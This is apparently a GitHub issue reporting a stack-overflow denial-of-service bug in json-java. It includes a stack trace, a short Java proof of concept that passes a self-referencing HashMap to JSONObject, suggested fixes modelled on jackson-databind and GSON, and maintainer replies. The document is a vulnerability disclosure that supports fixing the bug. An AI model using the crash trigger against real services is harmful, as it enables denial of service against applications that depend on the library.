Stack overflow error caused by json-java serialization Map

[PoppingSnack]

Stack overflow error caused by json-java serialization Map

Description

json-java before v20230227 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread "main" java.lang.StackOverflowError
	at org.json.JSONObject.<init>(JSONObject.java:284)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)

PoC

        <dependency>
            <groupId>org.json</groupId>
            <artifactId>json</artifactId>
            <version>20230227</version>
        </dependency>

import org.json.JSONObject;

import java.util.HashMap;

public class PoC2 {

    public static void main(String[] args) {
        HashMap<String,Object> map=new HashMap<>();
        map.put("t",map);
        JSONObject jsonObject = new JSONObject(map);
        String jsonString = jsonObject.toString();
    }
}

Rectification Solution

1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)

2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

References

1. If the value in map is the map's self, the new new JSONObject(map) cause StackOverflowError which may lead to dos jettison-json/jettison#52
2. https://github.com/jettison-json/jettison/pull/53/files

[stleary]

#720 and #723 might provide an example of how to fix this for JSONObject.

[mccartney]

Related to #701 ?